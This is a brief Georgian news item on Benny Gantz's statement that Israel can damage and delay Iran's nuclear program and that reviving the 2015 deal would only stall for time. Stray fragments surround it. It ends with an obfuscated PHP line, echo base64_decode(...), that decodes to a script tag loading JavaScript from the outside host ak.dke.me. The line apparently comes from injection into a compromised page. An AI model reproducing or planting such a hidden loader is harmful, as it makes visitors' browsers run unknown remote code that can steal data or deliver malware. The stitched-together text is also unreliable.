celsiusi
ავერსი შნაიდერი
ისრაელს შეუძლია, სერიოზული ზიანი მიაყენოს და გადადოს ირანის ბირთვული პროგრამა, – ამის შესახებ ისრაელის თავდაცვის მინისტრმა, ბენი განცმა განაცხადა.
 
ისრაელის თავდაცვის უწყების ხელმძღვანელის თქმით, ირანის ბირთვული საქმიანობის შეზღუდვის მიზნით 2015 წლის შეთანხმების აღორძინება მხოლოდ შეფერხების ტაქტიკა იქნება.
 
„ირანი გლობალური პრობლემაა. ეს არ არის მხოლოდ ისრაელის პირადი პრობლემა”, – განაცხადა ბენი განცმა.
 
ისრაელის თავდაცვის მინისტრის თქმით, შეთანხმება ირანელებს საშუალებას მისცემს, განავითარონ თავიანთი ეკონომიკა და საბოლოოდ დააკანონონ თავიანთი ბირთვული პროგრამა.
542
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");